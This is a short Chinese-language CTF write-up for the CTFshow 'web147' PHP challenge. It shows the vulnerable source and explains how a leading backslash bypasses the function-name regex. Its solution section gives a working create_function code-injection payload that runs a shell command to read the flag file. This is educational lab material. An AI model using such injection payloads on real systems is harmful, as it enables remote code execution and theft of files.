目錄

• 源碼
• 思路
• 題解
• 總結

---

源碼

<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-19 02:04:38*/highlight_file(__FILE__);if(isset($_POST['ctf'])){$ctfshow = $_POST['ctf'];if(!preg_match('/^[a-z0-9_]*$/isD',$ctfshow)) {$ctfshow('',$_GET['show']);}}

---

思路

$ctfshow('',$_GET['show']);一看格式,里面想到create_function,但是發現一直沒有回顯

,仔細看了下源碼,!preg_match('/^[a-z0-9_]*$/isD',$ctfshow)發現要匹配不成功,那繼續fuzz一下吧,頭部尾部都可以試一試

先試試頭部

可以url編碼一下

發現%5c可以用,解碼一下是 \

加\ 可以調用指定命名空間下的函數， 如果只是單獨的一個 \ 就是調用根命名空間下的函數

namespace A\B; function func () {return 'hello world!'; }namespace C; A\B\func(); // hello world!

題解

get:?show=}?><?=`tac f*`;// post:ctf=\create_function

---

總結

遇事不決就fuzz

總結

以上是生活随笔為你收集整理的CTFshow php特性 web147的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。